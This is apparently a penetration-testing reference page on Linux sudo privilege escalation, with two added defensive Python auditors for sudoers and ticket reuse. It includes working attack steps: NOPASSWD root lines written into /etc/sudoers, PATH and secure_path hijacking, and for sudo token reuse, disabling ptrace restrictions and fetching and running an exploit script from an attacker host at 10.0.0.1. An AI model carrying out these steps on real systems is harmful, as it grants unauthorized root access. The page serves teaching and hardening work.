Sudo Privilege Escalation
Sudo commands might be vulnerable to privilege escalation (PrivEsc).
GTFOBins
GTFOBins provides a wide variety of payloads for privilege escalation, so it is recommended to look there first.
Investigation
Version
If the sudo version is <=1.28, try the following command.
As Another Users
List Privileges Commands
We may be able to see the commands available as another user.
sudo -l
sudo -ll
# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash
We might also find them in the following files.
If we find the following result for sudoers, we might be able to get a root shell as follows.
Edit Sudoers
If we have permission to write /etc/sudoers, we can modify this file.
Now add one of the following lines; the first two allow us to execute all commands as root, the third only a specific command. Assume we are logged in as john.
# Unrestricted
john ALL=(ALL:ALL) ALL
# or
john ALL=(root) NOPASSWD: ALL
# Specific command as root
john ALL=(root) NOPASSWD: /usr/bin/passwd
Command Forgery (NOPASSWD)
If you are allowed to execute some command, you can forge the contents of that command.
First, check the properties of the entry.
If you can confirm that it can be executed as root without a password, create a command with the same name in an arbitrary folder to which you can write files.
Next, change the permissions so that it is executable.
Then add that folder to the PATH environment variable.
Now execute the command as root.
Command Forgery (SETENV, NOPASSWD)
If you find SETENV: in sudoers, you can set the PATH when running the command.
As in the previous section, prepare the payload.
Now run the command as root while setting the PATH.
Command Path Hijacking
sudo -l
env_reset
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
(root) python /home/user/example.py
If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check whether we have permission to write to each directory in secure_path.
Assuming we can write an arbitrary binary file under /usr/sbin, we can create a payload there.
For example, we create a python binary under /usr/sbin.
Then execute the sudo command.
Now we should get a root shell.
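The sudoers weaknesses covered in the sections above (unrestricted rules, NOPASSWD, SETENV, relative command names resolved through the search path, and writable directories in secure_path or in a command's arguments) can all be spotted from the rule file itself. The following auditor is an added example, not code from the original page: it parses user-specification and Defaults lines from sudoers text and reports which rules an unprivileged account could abuse. The sudoers content and the set of writable directories are constructed for the demonstration; a real run would read /etc/sudoers plus /etc/sudoers.d and test directory writability with os.access.

```python
"""Flag sudoers rules that enable command forgery, PATH hijacking or unrestricted root.

Added example (not from the original page). Parses user rules and Defaults
and checks command locations and secure_path against directories the
auditing account can write to.
"""
import posixpath
import re
import shlex

# Constructed sample sudoers content (not from any real host).
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root ALL=(ALL:ALL) ALL
john ALL=(ALL:ALL) ALL
alice ALL=(root) NOPASSWD: /usr/bin/passwd
bob ALL=(root) NOPASSWD: SETENV: /usr/bin/python3 /home/bob/backup.py
carol ALL=(root) NOPASSWD: python /home/carol/example.py
"""

# Directories the (hypothetical) unprivileged auditor found writable.
WRITABLE_DIRS = {"/usr/sbin", "/home/carol", "/tmp"}

# user host=(runas) tags: commands   (runas part is optional)
RULE_RE = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
DEFAULTS_RE = re.compile(r"^Defaults(?:[:@!>]\S+)?\s+(.*)$")


def parse_sudoers(text):
    """Return (defaults, rules). defaults maps option -> value (True for flags);
    each rule carries user, host, runas, the set of tags and its command strings."""
    defaults, rules = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        d = DEFAULTS_RE.match(line)
        if d:
            for opt in shlex.split(d.group(1)):  # shlex strips the quotes
                name, sep, value = opt.partition("=")
                defaults[name] = value if sep else True
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, runas, rest = m.groups()
        tags, commands = set(), []
        for spec in rest.split(","):
            words = spec.split()
            while words and words[0].endswith(":"):  # NOPASSWD:, SETENV:, ...
                tags.add(words.pop(0)[:-1].upper())
            if words:
                commands.append(" ".join(words))
        rules.append({"user": user, "host": host, "runas": runas or user,
                      "tags": tags, "commands": commands})
    return defaults, rules


def find_risks(text, writable_dirs):
    """Return (user, category, detail) findings for every non-root rule."""
    defaults, rules = parse_sudoers(text)
    secure_path = defaults.get("secure_path")
    search_dirs = secure_path.split(":") if isinstance(secure_path, str) else []
    findings = []
    for rule in rules:
        user = rule["user"]
        if user == "root":
            continue
        if "NOPASSWD" in rule["tags"]:
            findings.append((user, "nopasswd", "runs without authenticating"))
        if "SETENV" in rule["tags"]:
            findings.append((user, "setenv", "caller may set PATH and other variables on the sudo command line"))
        for command in rule["commands"]:
            words = command.split()
            prog = words[0]
            if prog == "ALL":
                findings.append((user, "unrestricted", "may run any command as " + rule["runas"]))
                continue
            if not prog.startswith("/"):
                # Relative name: sudo resolves it through secure_path (or the caller's PATH if unset).
                if not search_dirs:
                    findings.append((user, "path_hijack", f"{prog!r} resolved via caller-controlled PATH"))
                for d in search_dirs:
                    if d in writable_dirs:
                        findings.append((user, "writable_search_dir", f"{prog!r} can be shadowed by a file in writable {d}"))
            elif posixpath.dirname(prog) in writable_dirs:
                findings.append((user, "writable_command", f"{prog} lives in a writable directory"))
            for arg in words[1:]:  # scripts passed as arguments are as sensitive as the binary
                if arg.startswith("/") and posixpath.dirname(arg) in writable_dirs:
                    findings.append((user, "writable_argument", f"{arg} can be modified by the caller"))
    return findings


if __name__ == "__main__":
    for user, category, detail in find_risks(SAMPLE_SUDOERS, WRITABLE_DIRS):
        print(f"{user:8} {category:20} {detail}")
```

In the constructed sample, john is flagged as unrestricted, alice only as NOPASSWD (her command lives in a non-writable directory), bob for NOPASSWD plus SETENV, and carol for a relative command name with a writable directory in secure_path and a script argument under her own home. The fix for each class is the same as the weakness: fully qualified command paths, no SETENV unless the command needs it, secure_path directories owned by root and not group- or world-writable, and scripts run via sudo kept outside user-writable locations.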
Shell in Prompt
If we find another user's script that can be executed as root, we can input `/bin/bash -i` at its prompt to get a shell as that user.
Reuse Sudo Tokens
Reference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
If the current user has executed some command using sudo, we might be able to escalate to root privileges. Check that there is no restriction on ptrace.
cat /proc/sys/kernel/yama/ptrace_scope
0
# We can temporarily set it to 0 if we have permissions.
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
If the target system does not have the gdb binary, we can download it.
# In local machine, download the debian package.
wget http://fi.archive.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_9.1-0ubuntu1_amd64.deb -O gdb.deb
python3 -m http.server
# In remote machine, download the deb package and extract it.
wget http://10.0.0.1:8000/gdb.deb
dpkg -x gdb.deb ~
Next, prepare the exploit script from the repo and execute it.
# In local machine, download the shell script to exploit.
wget https://github.com/nongiach/sudo_inject/blob/master/exploit.sh
python3 -m http.server
# In remote machine, download it and execute.
wget http://10.0.0.1:8000/exploit.sh
sh exploit.sh
After that, we can spawn the root shell.
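Ticket reuse of this kind depends on two settings a defender controls: the Yama ptrace_scope sysctl, which decides whether a same-uid process can be attached to at all, and the sudoers timestamp_timeout, which decides how long a cached ticket stays valid. The following checker is an added example, not code from the original page or from the sudo_inject project: it interprets the sysctl value, reads timestamp_timeout from Defaults lines, and scans sudo authorization log lines to list the accounts whose processes currently hold a live ticket. The ptrace_scope content, sudoers Defaults and log lines are all constructed; the log parser assumes RFC 3339 timestamps and the 5-minute timeout is sudo's upstream default (distributions may build in a different value).

```python
"""Assess exposure to sudo ticket reuse and list accounts with live tickets.

Added example (not from the page or the sudo_inject project). Inputs are the
text of /proc/sys/kernel/yama/ptrace_scope, sudoers Defaults lines and sudo
log lines; all sample data here is constructed.
"""
import re
from datetime import datetime, timedelta

PTRACE_SCOPE_MEANING = {
    0: "classic: any process may ptrace another process with the same uid",
    1: "restricted: only descendants, or a tracer named via PR_SET_PTRACER",
    2: "admin-only: attaching requires CAP_SYS_PTRACE",
    3: "no attach: ptrace attach disabled until reboot",
}
UPSTREAM_TIMEOUT_MINUTES = 5  # sudo's compiled-in default; distros may differ

# Constructed sample inputs.
SAMPLE_PTRACE_SCOPE = "0\n"
SAMPLE_DEFAULTS = "Defaults env_reset\nDefaults timestamp_timeout=-1\n"
SAMPLE_LOG = [
    "2024-05-01T10:00:01 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    "2024-05-01T09:30:00 host sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx",
    "2024-05-01T10:03:30 host sshd[123]: Accepted publickey for carol from 10.0.0.5 port 50000",
]
SAMPLE_NOW = datetime(2024, 5, 1, 10, 4, 0)

SUDO_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+sudo:\s+(?P<user>\S+)\s*:\s*TTY=(?P<tty>\S+).*?COMMAND=(?P<cmd>.*)$")


def ptrace_scope_finding(scope_text):
    """Return (value, meaning, permissive) for the sysctl content."""
    scope = int(scope_text.strip())
    return scope, PTRACE_SCOPE_MEANING.get(scope, "unknown value"), scope == 0


def timestamp_timeout(defaults_text):
    """Ticket lifetime in minutes from Defaults lines; the last setting wins."""
    timeout = float(UPSTREAM_TIMEOUT_MINUTES)
    for line in defaults_text.splitlines():
        m = re.search(r"\btimestamp_timeout\s*=\s*(-?\d+(?:\.\d+)?)", line)
        if m:
            timeout = float(m.group(1))
    return timeout


def live_tickets(log_lines, now, timeout_minutes):
    """Users whose most recent sudo use falls inside the ticket lifetime."""
    last_seen = {}
    for line in log_lines:
        m = SUDO_LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m.group("ts"))
        user = m.group("user")
        if user not in last_seen or ts > last_seen[user]:
            last_seen[user] = ts
    if timeout_minutes < 0:          # -1: tickets never expire
        return sorted(last_seen)
    window = timedelta(minutes=timeout_minutes)
    return sorted(u for u, ts in last_seen.items() if now - ts <= window)


def assess(scope_text, defaults_text, log_lines, now):
    """Combine the three inputs into a list of human-readable findings."""
    scope, meaning, permissive = ptrace_scope_finding(scope_text)
    timeout = timestamp_timeout(defaults_text)
    findings = [f"ptrace_scope={scope} ({meaning})"]
    if permissive:
        findings.append("any same-uid process can be attached to, so a compromised user process reaches that user's cached ticket")
    if timeout < 0:
        findings.append("timestamp_timeout=-1: tickets never expire")
    elif timeout == 0:
        findings.append("timestamp_timeout=0: password required on every sudo, no reusable ticket")
    else:
        findings.append(f"timestamp_timeout={timeout:g} minutes")
    holders = live_tickets(log_lines, now, timeout)
    if holders:
        findings.append("users with live tickets: " + ", ".join(holders))
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_PTRACE_SCOPE, SAMPLE_DEFAULTS, SAMPLE_LOG, SAMPLE_NOW):
        print("-", f)
```

With the constructed inputs the checker reports ptrace_scope 0, a never-expiring timeout and live tickets for both alice and bob; with the upstream 5-minute timeout only alice's ticket would still be live at 10:04. The corresponding hardening is ptrace_scope of 1 or higher (the Ubuntu default) and a short or zero timestamp_timeout, so that a process compromised after the user authenticated has nothing to reuse.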